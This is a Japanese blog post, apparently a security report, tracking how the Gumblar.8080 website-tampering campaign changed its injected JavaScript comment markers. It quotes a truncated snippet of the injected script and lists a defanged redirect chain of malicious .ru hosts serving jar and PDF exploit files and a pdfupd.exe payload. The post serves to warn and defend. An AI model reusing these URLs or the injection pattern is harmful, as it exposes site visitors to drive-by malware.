|
攻撃者の気が変わったのかミスったのか、『/*handle exception*/』というコメント付きの不正なJavaScriptコードが埋め込まれてた一部サイトは、『/*Exception*/』(意味は「例外」)というコメント付きのものに落ち着きました。チェッカーを走らせてた『/*LGPL*/』の改ざんサイトすべてが、現在『/*Exception*/』に置き換わってます。 <script>/*Exception*/ document.write('<script src 〜
導かれる処理の流れは変わらず〜。下はその一例。 hXXp://wiktionary-org.gap.com.google-com-br.yourauthentic●ru:8080/ekolay.net/ekolay.net/ip138.com/huanqiu.com/google.com/ ↓ hXXp://wiktionary-org.gap.com.google-com-br.yourauthentic●ru:8080/index.php?ys ↓ hXXp://wiktionary-org.gap.com.google-com-br.yourauthentic●ru:8080/pics/win.jpg hXXp://wiktionary-org.gap.com.google-com-br.yourauthentic●ru:8080/pics/JavaGame.jar hXXp://wiktionary-org.gap.com.google-com-br.yourauthentic●ru:8080/pics/ChangeLog.pdf ↓ hXXp://truerealtime●ru:8080/main.php?id=5&hello302 (pdfupd.exe)仮に改ざん被害を受けてるサイトを踏んだとしても、無料でできる対策さえちゃんとやっておけば、ウイルスの発動は回避されます。対策してないと、何か(たとえばインチキ「Security Tool」)を調達してくるようなウイルスに自動的に感染します。 ・埋め込みコード変えドメインも一新、拡散続ける正規サイト改ざん (So-net セキュリティ通信) ・命名「Gumblar.8080系」、でもって改竄コードが変化してまた変化 (べつになんでもないこと) |
||||||
>
- コンピュータとインターネット
>
- インターネット
>
- その他インターネット
